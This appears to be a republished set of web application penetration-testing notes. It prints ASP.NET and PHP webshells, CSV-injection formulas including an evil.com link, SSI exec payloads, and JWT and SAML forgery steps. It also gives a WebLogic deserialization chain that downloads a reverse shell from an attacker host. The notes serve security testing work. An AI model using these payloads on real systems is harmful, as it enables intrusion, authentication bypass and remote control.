Here's an example with one of the webshells found in the fuzzdb project:

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string executeIt(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdClick(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>REALLY NICE</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>

REFERENCES

https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/

ANONYMOUS FUNCTION RCE IN PHP

$inputFunc = function() use($a, $b, $c, &$f){echo(exec('whoami'));};

PHP EXPERIMENTATION

If you need to test some php code, you can use the native web server to host it up:
php -S 127.0.0.1:80 -t .

Obviously you should be careful with this...

PHP INTERACTIVE SHELL

php -a

CSV INJECTION

Open a webpage: =HYPERLINK("http://evil.com:666","hell")

Resource: https://www.we45.com/blog/2017/02/14/csv-injection-theres-devil-in-the-detail

In excel on Windows, input the following to get a cmd shell:
=cmd|'cmd'!''

Great real world example:
https://rhinosecuritylabs.com/azure/cloud-security-risks-part-1-azure-csv-injection-vulnerability/

Great write-up here explaining what it is and why you want to be concerned: http://georgemauer.net/2017/10/07/csv-injection.html

A video showing an example of this as well:
https://www.youtube.com/watch?v=SC7AkclnG2g

CONTENT DISCOVERY

Burp intruder ftw. Custom content discovery paylaods:
https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10

USEFUL SCRIPTS

CONTINOUSLY CHECK IF A SITE IS UP OR DOWN

while true; do /usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down"; sleep 10; done

IDORS

https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/

SERVER-SIDE INCLUDES (SSI) INJECTION

Put this in for a vulnerable parameter: <!--#echo var="DATE_LOCAL" -->

You should see the current date and time output in the response if this worked.

If the previous payload worked, try something like this: <!--#printenv -->

This will output environment variables on the system.

Go for the gold: <!--#exec cmd="cat /etc/passwd"-->

I think it's pretty obvious what's happening in this one.

There is a great list of payloads that you can play around with here.

It is also worth testing the vulnerable parameter for XSS as well.

CLICKJACKING

Just use Burp's clickbandit. Also remember: Clickjacking is for clicks, not for keyboard.

QUICK AND DIRTY TEST SCRIPT

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://target.com" width="500" height="500"></iframe>
</body>
</html>

Resources:
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
https://javascript.info/clickjacking
https://www.tinfoilsecurity.com/blog/what-is-clickjacking

ATTACKING JSON WITH BURP

Evidently at this point in time (5/2018), Burp's scanner is not doing as well with testing json parameters for SQLi and RCE. Be sure to set custom injection points by sending a potentially vulnerable request to intruder, marking the parameters, right clicking, and clicking Actively scan defined insertion points from the dropdown.

Resource:
https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/may-2018/the-right-way-to-test-json-parameters-with-burp

DESERIALIZATION VULNERABILITIES

Writeup on Oracle Weblogic CVE-2018-2628
Java Deserialization Scanner Burp Extension
Java Serialized Payloads Burp Extension

OTHER WRITE-UPS

https://securitycafe.ro/2017/11/03/tricking-java-serialization-for-a-treat/
https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/Exploiting-Blind-Java-Deserialization

TOOLS:

Ysoserial

ORACLE WEBLOGIC JAVA OBJECT RMI CONNECT-BACK DESERIALIZATION RCE (JANUARY 2017 CPU)

OUT OF BAND TEST

  1. Start a listener:
python -m http.server 4000
  1. Specify the command to run on the JRMPListener host:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 4040 CommonsCollections5 'curl http://<system with listener>:4000/'
  1. Run the exploit:
python2 deserialize_exploit.py -t <vulnerable system ip> -p <vulnerable system port> --jip <system with listener> --jport 4040 --ysopath ysoserial.jar --cmd ""

GET A SHELL

  1. Generate a payload with msfvenom:
msfvenom -p cmd/unix/reverse_bash LHOST=<attacker system> LPORT=4444 -f raw > shell.sh
  1. Start a listener:
python -m http.server 4000
  1. Specify the command to download the reverse shell on the JRMPListener host:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 4040 CommonsCollections5 'curl -o /tmp/shell.sh http://<attacker system>:4000/shell.sh'
  1. Start a netcat listener for the reverse connection:
nc -lvnp 4444
  1. Run the exploit:
python2 deserialize_exploit.py -t <vulnerable system ip> -p <vulnerable system port> --jip <attacker system> --jport 4040 --ysopath ysoserial.jar --cmd ""
  1. Run the JRMPListener again to run the reverse shell that we downloaded in the previous step:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 4040 CommonsCollections5 'sh /tmp/shell.sh'
  1. Profit

USE AUTORIZE TO FIND AUTHORIZATION ISSUES

  1. Login to the target application as a low privileged user, go to authorize tab in burp - autorize should be off
  2. Click Configuration
  3. Click Fetch cookies from last request
  4. Open incognito window
  5. Login as high privileged user
  6. Click Autorize is off
  7. Go to areas of site that are admin only
  8. Look for orange/green in the columns

TEST INSECURE JWT IMPLEMENTATION

CHANGE THE USER IN THE PAYLOAD

  1. Capture the bearer token
  2. Base64 decode the second section of the token (the Payload)
  3. Change the user to another valid user within the context of the application
  4. Base64 encode the new Payload
  5. Replace the existing second section with the new Payload
  6. Send the token and see if the application takes it

CHANGE ALGORITHM TO NONE

  1. Capture a request with the bearer token, for example:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDkzNjEwNSwiZXhwIjoxNTU0OTM2MjI1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.CUJeDfpJCBD-RKCkGe6q5U2byv0rkxZnRhvPwyFYglg
  1. Base64 decode the first section of the token (everything before the first .) with Burp Decoder:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 =>
{"typ":"JWT","alg":"HS256"}
  1. Change "alg":"HS256" to "alg":"none" and Base64 encode it:
{"typ":"JWT","alg":"none"} =>
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=
  1. Replace the first section of the token with it and remove the last part of the token (the signature), but leave the period at the end:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDkzNjEwNSwiZXhwIjoxNTU0OTM2MjI1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.

Awesome demo site for testing purposes

CHANGE ALGORITHM FROM RS256 TO HS256

  1. Get the public cert from the target server:
openssl s_client -connect www.google.com:443 2>/dev/null </dev/null |  sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > cert.pem
  1. Turn it into the public key:
openssl x509 -in cert.pem -pubkey -noout > public.pem

One-liner alternative:

openssl s_client -connect www.google.com:443 | openssl x509 -pubkey -noout > public.pem
  1. Turn it into ASCII hex:
cat public.pem | xxd -p | tr -d "\\n" > hex.txt
  1. Get a JWT token, for example:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDk0MTE5NywiZXhwIjoxNTU0OTQxMzE3LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.OQq0VqiYsSxTzTSFEnwVVW0eRbrkeEW5VnsGYDLQ5BXMAKfTGbXxL00s07JvLDhWJsSuKyOwkWOh1evUSBikZ97zQgqqYvECv26FyhxGKnzXIWK5Efg8H0lsmy7HJ-YQJDbhRkZLJ6G5DPW5bCxjzRFcvzqtMmiAM0B3zMiSXOMSMJ_NtmVe1WtM7lQD38a2uDfOtuFSn5e0D2RgFJa2lOP2d1oFGchJqDM9IbkAZSzAlHx0tftR2DqV-N3VlD0UiAWygVfWQukOiGPa5ms0pz886B4hFP1xmBeNK49y1SLhQ7yw2VozFhte6mvQFbPTXHqFxCqB8MG0fn0LkqtHXg
  1. Take the first section and change it from RS256 to HS256:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9 =>
{"typ":"JWT","alg":"RS256"} =>
{"typ":"JWT","alg":"HS256"} =>
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
  1. Use the hex in hex.txt for the signing operation with the first two parts of the token (without the period at the end):
echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDk0MTE5NywiZXhwIjoxNTU0OTQxMzE3LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a

This outputs the HMAC signature:

076be5cb34056468b78a2c27194516912f5346201e9dd674ae97b1fb04058a4e
  1. Take the output and turn it into JWT format with python:
python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('076be5cb34056468b78a2c27194516912f5346201e9dd674ae97b1fb04058a4e')).replace('=','')\")"

This will output something like this:

B2vlyzQFZGi3iiwnGUUWkS9TRiAendZ0rpex-wQFik4
  1. Take the output and put it in for the signature (the last section of the token):
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU1NDk0MTE5NywiZXhwIjoxNTU0OTQxMzE3LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.B2vlyzQFZGi3iiwnGUUWkS9TRiAendZ0rpex-wQFik4

Awesome demo site for testing purposes

Resources:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/january/jwt-attack-walk-through/
https://stackoverflow.com/questions/7885785/using-openssl-to-get-the-certificate-from-a-server

Note that when you're modifying the base64 string, you need to add padding (=) in order to get the correct string representation. It is worth noting that this is not required by RFC 7515

This is a cheatsheet that covers the various things that should be tested when looking at a site that uses JWT: https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf

Useful resources:
Great site with a demo page: https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
Debug jwt tokens: https://jwt.io/
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/JSON_Web_Token_Cheat_Sheet_for_Java.md

Useful writeups:
https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html
https://medium.com/@0xSyndr0me/h1702-2018-web-challenge-write-up-4aea52d31807
https://gist.github.com/amalmurali47/8cf251f75db282376c8f58c27d7d900a

LFI

BUG BOUNTY WRITE-UPS:

https://hack-ed.net/2017/11/05/finally-a-bug-bounty-write-up-lfi/

SUBDOMAIN TAKEOVER

https://0xpatrik.com/subdomain-takeover-starbucks/
https://medium.com/@hakluke/how-to-setup-an-automated-sub-domain-takeover-scanner-for-all-bug-bounty-programs-in-5-minutes-3562eb621db3

EXISTING CHEATSHEETS AND RESOURCES

This details all of the steps from recon to exploitation. Definitely worth checking out:
https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/
Another great one:
https://danielmiessler.com/projects/webappsec_testing_resources/
Some awesome bug hunting findings:
https://www.youtube.com/watch?v=mQjTgDuLsp4

GOOD RESOURCES FOR DEVELOPERS

These are some sites that you can send to developers that are trying to understand web application security fundamentals.

https://medium.freecodecamp.org/a-quick-introduction-to-web-security-f90beaf4dd41

SAML ATTACKS

CHANGING THE USER

  1. Intercept a request with the SAMLResponse
  2. Locate the <NameID[stuff]</NameID>
  3. Modify the <NameID[stuff]</NameID> tag to another user with the help of the SAML Raider Burp Extension. For example, user@site.com to admin@site.com
  4. Forward it on

STRIPPING THE SIGNATURE AND CHANGING THE USER

  1. Intercept a request with the SAMLResponse
  2. Locate the <NameID[stuff]</NameID>
  3. Modify the <NameID[stuff]</NameID> tag to another user with the help of the SAML Raider Burp Extension. For example, user@site.com to admin@site.com
  4. Locate the ds:SignatureValue
  5. Remove the contents in-between these two strings
  6. Forward it on

Learning Resources:
https://duo.com/blog/the-beer-drinkers-guide-to-saml
https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
https://research.aurainfosec.io/bypassing-saml20-SSO/

BASIC PHP WEBSHELL

webshell.php:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

SAST SCRIPTS

Find deserialization vulns in java-based repo:

find . -name "*.java" -print -exec grep -E "XMLdecoder|XStream|ObjectInputStream|Serializable" {} \; | tee prodsec/serializable.txt

GITLEAKS

Run gitleaks against a repo using multithreading on OSX:

CPU=$(sysctl -a |grep cpu.thread_count | grep -Po '(\d+)')
gitleaks --repo-path=/path/to/repo --threads=$CPU -v --report=scp-commerce-results.csv

On Linux:

CPU=$(cat /proc/cpuinfo | grep -ic ^processor)
gitleaks --repo=https://github.com/owner/repo --threads=$CPU

Resource:
https://computingforgeeks.com/gitleaks-audit-git-repos-for-secrets/

SESSION VS LOCAL STORAGE

With session storage, the token does not persist after the browser has been closed. For local storage, the token persists after the browser is closed until it expires.

OOB TESTING

I've used the following resources in the past for OOB testing:

  1. Burp Collaborator
  2. https://webhook.site
  3. python3 -m http.server
 

WEB APPLICATION PENETRATION TESTING NOTES的更多相关文章

  1. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

  2. Performance testing of web application

    Testing the performance of web application is easy . It's easy to design unrealistic scenario . Easy ...

  3. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  4. Ethical Hacking - Web Penetration Testing(1)

    How to hack a website? An application installed on a computer. ->web application pen-testing A co ...

  5. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  6. Penetration Testing、Security Testing、Automation Testing

    相关学习资料 http://www.cnblogs.com/LittleHann/p/3823513.html http://www.cnblogs.com/LittleHann/p/3828927. ...

  7. 14 Live CDs for Penetration Testing (Pen Test) and Forensic

    http://www.ivizsecurity.com/blog/penetration-testing/live-cd-penetration-testing-pen/ Yesterday I wa ...

  8. [Windows Azure] Adding Sign-On to Your Web Application Using Windows Azure AD

    Adding Sign-On to Your Web Application Using Windows Azure AD 14 out of 19 rated this helpful - Rate ...

  9. You may receive an exception when you browse a .NET Framework 2.0 ASP.NET Web application

    SYMPTOMS When you browse a Microsoft .NET Framework 2.0 ASP.NET Web application, you may receive one ...

随机推荐

  1. python文件路径分隔符的详细分析

    写了挺久的python,文件分隔符的掌握肯定是必须的,但是我之前写的都是不规范的文件路径分隔符,例如‘’C:\User\temp\python.txt’,一直都没有报过错.也不知为啥,今天查阅资料才知 ...

  2. andorid jar/库源码解析之Dagger/Dagger2

    目录:andorid jar/库源码解析 Dagger.Dagger2: 作用: 1.用于解耦Activity和业务逻辑 2.在使用业务的时候,不需要重复编写new代码. 3.当业务变化的时候,不需要 ...

  3. Linova and Kingdom(树型-贪心)

    题目大意:给定一棵树,1为首都(首都可以是工业城市也可以是旅游城市),一共有n个点. 其中要选出k个工业城市,每个工业城市出一个代表去首都,其快乐值是其途径旅游城市(非工业)的个数 求所有快乐值相加的 ...

  4. 【HBase】带你了解一哈HBase的各种预分区

    目录 简单了解 概述 设置预分区 一.手动指定预分区 二.使用16进制算法生成预分区 三.将分区规则写在文本文件中 四.使用JavaAPI进行预分区 简单了解 概述 由上图可以看出,每一个表都有属于自 ...

  5. Mysql常用sql语句(22)- insert 插入数据

    测试必备的Mysql常用sql语句系列 https://www.cnblogs.com/poloyy/category/1683347.html 前言 终于讲完基础的查询语句了...这篇讲的就是插入数 ...

  6. 帝国cms列表页内容简介字段smalltext去除里面html格式代码 设置方法

    帝国cms列表页内容简介字段smalltext去除里面html格式代码帝国cms列表页调用内容简介出现html代码怎么办 近来在用帝国cms的时候,发现一个问题,在列表页调用产品简介的时候出现了这种h ...

  7. 网页爬虫--python3.6+selenium+BeautifulSoup实现动态网页的数据抓取,适用于对抓取频率不高的情况

    说在前面: 本文主要介绍如何抓取 页面加载后需要通过JS加载的数据和图片 本文是通过python中的selenium(pyhton包) + chrome(谷歌浏览器) + chromedrive(谷歌 ...

  8. Linux设定系统变量和单个用户的环境变量问题

    环境为Ubuntu. 设定系统变量意思就是所有用户都可以使用设定的环境变量,而设定用户的单个环境变量意思就是只有设定环境的该用户才可以使用这个环境变量. 这里以java的jdk环境变量JAVA_HOM ...

  9. Docker之从零开始制作docker镜像

    以前学习docker是直接docker pull命令直接拉取Linux中已有镜像,并创建容器,添加应用程序,但是docker镜像一开始是怎么来的呢?下面将从零开始介绍整个docker镜像的制作过程(初 ...

  10. Java Web项目部署到阿里云服务器(ECS)

    本篇随笔只是记录博主第一次将自己的Java项目部署到阿里云服务器的大致过程,具体细节还请参考别的博文. 一.项目介绍 我做的项目是利用maven项目构建工具进行搭建基于SSM框架的代码共享管理系统,主 ...